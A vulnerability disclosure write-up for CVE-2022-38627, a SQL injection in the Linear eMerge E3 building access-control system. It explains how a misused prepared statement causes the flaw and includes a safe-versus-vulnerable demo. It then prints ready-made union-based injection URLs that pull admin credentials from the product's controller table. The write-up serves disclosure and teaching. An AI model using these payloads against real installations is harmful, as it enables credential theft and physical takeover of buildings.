CVE-2022-38627: A journey through SQLite Injection to compromise the whole enterprise building


Introduction:

In this research, I will show you how I managed to find this critical 0-day, which allows me to control the entire enterprise building (doors, cameras, elevators, etc.). In addition, I can collect employee data and add new employees who have permission to access the enterprise building, all of this on top of the usual impact of a critical SQL injection vulnerability.

In fact, in this research you will see hacking-movie scenes implemented as a real-life scenario.

Summary of Linear eMerge E3 Series product:

The Linear eMerge E3 Series is one of the industry-leading products in building management systems and one of the most widely used products in the industry. It is used to control access in:

School Districts and Campuses (K12 & Higher Ed)
Corporate Campuses
State/Local Government buildings (Civic Centers, City Hall, Police Stations, Jails, etc.)
Public Utilities
Transportation (Airports, Subway, Bus Depots)
Places of Worship (Churches, Mega-Church campuses)
Medical Facilities (Hospitals, Pharma, Bio Labs, etc.)
And more

Let’s start the Static-Analysis:

I came across the endpoint /badging/badge_template_print.php, so let’s take a look at the code.

As you can see, the developers take user input through the “idt” parameter and then pass it to the query using a prepared statement, which should prevent SQL injection.

But wait a minute: there is a wrong implementation of the prepared statement here, and to understand what has gone wrong we first need to understand the prepared statement workflow.

The prepared statement processing workflow passes through 7 phases

[Figure: prepared statement phases for SQL query processing]

Simply put, the query is passed to the database like this:

$sth = $db->prepare("SELECT * FROM ".dbtable." where No = ?");

where the question mark is called a parameter placeholder.

So what happens under the prepared statement is that the query will be passed through 7 phases:

1- Parsing Phase: the query is parsed for syntax errors and misspellings to ensure the validity of the SQL query, then

2- Semantics Check Phase: the Database Management System (DBMS) establishes the validity of the query. Do the specified columns and table exist? Does the user have privileges to execute this query?

3- Binding Phase: the database engine detects the placeholders, and the query is compiled with the placeholders in place. The user-supplied data will be added later, at the placeholder replacement phase, like this:

$sth->bindValue(1, $id, PDO::PARAM_INT);

4- Query Optimization Phase: The DBMS chooses the best algorithm for executing the query.

5- Cache Phase: the best algorithm is saved in the cache, so the next time the same query is executed it skips the first four phases and jumps straight to the placeholder replacement phase.

6- Placeholder Replacement Phase: at this phase the placeholders are replaced with the user’s data. However, the query has already been compiled (binding phase), so the final query does not go through the compilation phase again. For this reason, the user-provided data is always interpreted as a simple value and cannot modify the original query’s logic, which makes the query immune to SQL injection for that data.

7- Execution Phase:

$sth->execute();

Then finally the query is executed successfully.

These are the phases that prepared statements pass through to prevent SQL injection.

So let’s take another look at what happened here.

The developer put the $id parameter that comes from the user directly into the prepared statement string instead of binding the value as described above, so if the user input parameter is something like this:

?id=1 UNION SELECT * FROM User

then the $sth variable value will be like this:

$db->prepare("SELECT * FROM User where No=1 UNION SELECT * FROM User")

So the prepared statement takes our input as part of the query (not as a bound value), and the user input passes through all phases starting from phase one. The SQL compiler therefore compiles it as part of the query rather than treating it as a bound value, because it entered the query in the first phase and not in the sixth phase (placeholder replacement), which leads to a successful SQLi.
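To make the difference concrete, here is an added example (not code from the original post or from the Linear eMerge product) that mirrors the bug described above with Python’s sqlite3 module instead of PHP PDO: the first function splices the “idt” value into the SQL text before it is prepared, the second binds it through a placeholder. The in-memory schema, table contents and payload are constructed for the demo and only stand in for the real tables named in the write-up.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory schema; table names follow the write-up,
    but the columns and rows are sample data for this demo only."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE User (No INTEGER, ImageFile TEXT);
        INSERT INTO User VALUES (1, 'badge_1.png'), (2, 'badge_2.png');
        CREATE TABLE controller (id TEXT, password TEXT);
        INSERT INTO controller VALUES ('admin', 'sample-password');
        """
    )
    return db


def image_file_vulnerable(db: sqlite3.Connection, idt: str) -> list:
    """Mirrors the bug on the page: the user value is concatenated into the
    SQL string *before* it is prepared, so it goes through the parsing and
    compilation phases as part of the query."""
    sql = "SELECT ImageFile FROM User WHERE No=" + idt
    return [row[0] for row in db.execute(sql)]


def image_file_safe(db: sqlite3.Connection, idt: str) -> list:
    """The corrected pattern: the query is compiled with a '?' placeholder and
    the value is bound afterwards, so SQLite only ever compares it as data."""
    sql = "SELECT ImageFile FROM User WHERE No=?"
    return [row[0] for row in db.execute(sql, (idt,))]


# Constructed payload in the shape of the page's UNION-based injection,
# reduced to one column because the demo query selects one column.
PAYLOAD = "1337 UNION SELECT id||':'||password FROM controller"

if __name__ == "__main__":
    db = build_db()
    print("vulnerable, benign input :", image_file_vulnerable(db, "1"))
    print("vulnerable, payload      :", image_file_vulnerable(db, PAYLOAD))
    print("bound, benign input      :", image_file_safe(db, "1"))
    print("bound, payload           :", image_file_safe(db, PAYLOAD))
```

With the bound version the whole payload string is compared against the integer column and simply matches nothing, which is exactly the “data cannot modify the query’s logic” property of phase 6; with the concatenated version the same string is compiled as SQL and the UNION returns the controller row.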

The $xml variable loads an XML file selected by the “tpl” parameter.

The first “if statement” forces us to load an XML file that contains a <picture> tag; the developers created the XML file “aa.xml” for that, so all we need to do is put the file name in the “tpl” parameter: ?tpl=aa.xml

The second “if statement” must be made false so that the else branch executes, which prints the “ImageFile” column on the page and lets us extract the database content.

So in our exploitation we need to concatenate the output into the ImageFile column, as this is the way to extract the database.

Exploitation:

As I already have access to the source code and database, I know that the ImageFile column is column number 12 out of 39 columns in the “User” table, so we don’t need to exploit it the way we would a black-box SQL injection.

So we exploit it using a union-based payload: we concatenate the output at column 12 and fill the other 38 columns with NULL values.

/badging/badge_template_print.php?tpl=aa.xml&idt=1337 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,' SWVersion:'||SWVersion,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from version

The output will be the software version from the version table; since I have concatenated the output at column 12, the output looks like this:

SWVersion:<software version will be printed here>

What about extracting admin credentials?

/badging/badge_template_print.php?tpl=aa.xml&idt=1337 union select NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,' Admin-ID-is:'||id||'%20Admin-Password-is:'||password,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from controller

After getting the admin credentials, I can log in with them and control the whole enterprise building from the web dashboard.

Automation:

For detection of the vulnerability, I made this nuclei template to scan your bug bounty programs or your enterprise assets.

You can find it in my Security Research repository:

https://github.com/omarhashem123/Security-Research/tree/main/CVE-2022-38627

┌──(omar㉿kali)-[~]
└─$ nuclei -t CVE-2022-38627.yaml -l subdomains.txt

At this point we have reached the end, so I hope you guys enjoyed it.

Twitter: @OmarHashem666

Linkedin: https://www.linkedin.com/in/omar-1-hashem

Youtube: https://www.youtube.com/@omarhashem7351
